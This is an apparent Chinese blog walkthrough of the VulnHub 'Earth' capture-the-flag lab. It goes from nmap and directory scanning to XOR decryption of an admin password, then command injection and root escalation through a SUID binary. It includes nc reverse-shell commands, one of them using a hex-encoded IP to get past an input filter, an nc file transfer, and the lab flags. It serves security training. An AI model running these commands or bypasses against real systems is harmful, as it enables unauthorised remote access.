vulnhub_Earth
前言
靶机地址->>>vulnhub_Earth
攻击机ip:192.168.20.121
靶机ip:192.168.20.122
参考文章
https://www.cnblogs.com/Jing-X/archive/2022/04/03/16097695.html
https://www.cnblogs.com/wthuskyblog/p/16032277.html
https://www.cnblogs.com/CHOSEN1-Z13/p/15915195.html
探测靶机
- 使用nmap扫描c段
nmap 192.168.20.0/24
点击查看扫描结果
┌──(root㉿kali-purple)-[/home/kali]
└─# nmap 192.168.20.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:37 CST
Nmap scan report for 192.168.20.1
Host is up (0.00011s latency).
All 1000 scanned ports on 192.168.20.1 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.20.2
Host is up (0.00074s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.20.122
Host is up (0.00041s latency).
Not shown: 983 filtered tcp ports (no-response), 14 filtered tcp ports (admin-prohibited)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:29:AE:FF (VMware)
Nmap scan report for 192.168.20.254
Host is up (0.00018s latency).
All 1000 scanned ports on 192.168.20.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:F4:37:D0 (VMware)
Nmap scan report for 192.168.20.121
Host is up (0.0000020s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
3389/tcp open ms-wbt-server
Nmap done: 256 IP addresses (5 hosts up) scanned in 10.67 seconds
这里可以发现192.168.20.122为本次靶机开放了22,80端口以及443
- 使用-A参数查看完整靶机信息
nmap -A 192.168.20.122 -p 22,80,443
点击查看扫描结果
┌──(root㉿kali-purple)-[/home/kali]
└─# nmap -A 192.168.20.122 -p 22,80,443
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-15 21:44 CST
Nmap scan report for 192.168.20.122
Host is up (0.00047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_ 256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after: 2031-10-10T23:26:31
| tls-alpn:
|_ http/1.1
MAC Address: 00:0C:29:29:AE:FF (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|specialized
Running (JUST GUESSING): Linux 5.X|4.X|3.X|2.6.X (98%), Synology DiskStation Manager 5.X (92%), Crestron 2-Series (90%)
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 5.0 - 5.3 (98%), Linux 5.4 (98%), Linux 4.15 - 5.6 (97%), Linux 5.0 - 5.4 (96%), Linux 3.2 - 4.9 (94%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 (92%), Linux 3.10 - 4.11 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 2.6.32 - 3.13 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.20.122
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.67 seconds
这里可以发现80端口是400的一个状态然后443端口做了dns
DNS:terratest.earth.local
网站信息收集
- 更改hosts文件,目录为/etc/hosts
- 使用域名访问网站
发现了3个key
点击查看代码
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
-
扫描网站目录
-
使用dirsearch扫描
安装命令如下
apt install dirsearch
运行
dirsearch -u terratest.earth.local/
点击查看扫描结果
┌──(root㉿kali-purple)-[/home/kali/桌面]
└─# dirsearch -u terratest.earth.local/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/terratest.earth.local-_23-04-16_12-46-03.txt
Error Log: /root/.dirsearch/logs/errors-23-04-16_12-46-03.log
Target: http://terratest.earth.local/
[12:46:03] Starting:
[12:46:11] 301 - 0B - /admin -> /admin/
[12:46:11] 200 - 306B - /admin/
[12:46:11] 200 - 306B - /admin/?/login
[12:46:11] 200 - 746B - /admin/login
[12:46:18] 403 - 199B - /cgi-bin/
Task Completed
发现了网站后台地址,/cgi-bin/我们是没权限访问的
- 查看网站后台
手工尝试爆破几次发现不是常见弱口令
- dirb目录扫描
点击查看扫描结果
┌──(root㉿kali-purple)-[/home/kali/桌面]
└─# dirb https://terratest.earth.local/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Apr 16 13:11:00 2023
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)
-----------------
END_TIME: Sun Apr 16 13:11:03 2023
DOWNLOADED: 4612 - FOUND: 3
查看robots.txt
这里可与i看到有一个不一样的文件 /testingnotes.* 但是不知道后缀 fuzz一下
- fuzz文件后缀
使用dirbuster的字典就可以了,路径如下
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
wfuzz -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt https://terratest.earth.local/testingnotes.FUZZ | grep "200"
这里可以看到结果为.txt,访问一下
测试安全消息传递系统注意事项:
*使用 XOR 加密作为算法,应该像在 RSA 中使用一样安全。
*地球已确认他们已收到我们发送的消息。
*测试数据.txt用于测试加密。
*Terra 用作管理门户的用户名。
待办事项:
*我们如何安全地将每月密钥发送到地球?还是我们应该每周更换密钥?
*需要测试不同的密钥长度以防止暴力破解。密钥应该有多长?
*需要改进消息传递界面和管理面板的界面,目前非常基础。
- 解密
不是很懂加密所以这一部分参考大佬博客,附上博客连接
Jing-X的博客
点击查看代码
import binascii
key1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
key2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
key3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
decode_txt = b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
testdata = binascii.b2a_hex(decode_txt).decode()
print(hex(int(key1,16) ^ int(testdata,16)))
print(hex(int(key2,16) ^ int(testdata,16)))
print(hex(int(key3,16) ^ int(testdata,16)))
将解密出来的16进制转换一下
点击查看解密结果
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's hisCfy //}omo;/ppeare'2~d;f$'x,jj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/jkr0~h<Pj1s.=i뤽q,<j${ugn$u6&*+o'erlj|mnn/?;-'1%,f{kx8.`b)"⬮p`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-skl)$In*'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky8/k<
6=+1䍑*Ir8xo"P|7wfbn66놖ƥFF嫧&2FFƤW7F7F娦Ƅプ"WfFVV'Ff닖B쵲Bä&Ɔ텖V'2v⢶F¦Rf'7B&Ɔ텖V'2낖'Fw27F璂ƖfRV&VB¦R暶äƄ&Vv¦ⓆfV7BV'Fw2FƷ7W&Rƅ7W&f6RÖFƥF⦆R&ᙷ&Ƨᣗg邧ƂFrƶ2WvV#Cf2FFSvb6V7△㚆㛶GG3痦6f'榢Cd禗㻇gFǃG੶6Bǃff6WFFVRǷG#rFggභcGGcgVF
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
earthclimatechangebad4humans这一段字符串重复,实验密码
用户名,查看urlhttp://terratest.earth.local/admin/login
可以发现这是terra的测试,那么terra很有可能就是登录的用户名之一
账号:terra
密码:earthclimatechangebad4humans
漏洞发现及利用
发现漏洞
经过信息收集我们成功进入到了网站后台,在后台中有一个命令执行的输入框
可以发现权限很低
反弹shell
通过rce漏洞我们使用nc直接反弹shell到攻击机上
nc -nv 192.168.20.128 6666 -c bash
kali开启监听
后续更换了kali_linux IP为192.168.20.128
起初以为是有端口限制后面参考了网上的wp发现是服务器段采用了正则对IP进行数字匹配
find / -name "*.py" -type f | xargs grep "Remote connections are forbidden"
cat /var/earth_web/secure_message/forms.py
将ip地址转16进制即可反弹shell
nc -nv 0Xc0a81480 6666 -c bash
查找flag
find / -name "*flag*"
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]
SUID提权
find / -perm -u=s -type f 2>/dev/null
运行,发现报错
使用nc将文件传递回本地环境测试
点击查看代码
nc 192.168.20.128 1234 < /usr/bin/reset_root
nc -lnvp 1234 >reset_root
要chmod 777 reset_root给他权限
然后strace reset_root进行调试
运行之前安装strace
apt install strace
strace ./reset_root
可以发现是缺少了这三个文件
touch创建这三个文件,再运行reset_root,发现将root密码重置成了Earth:
点击查看命令
touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
提权完毕查看root目录下的flag
[root_flag_b0da9554d29db2117b02aa8b66ec492e]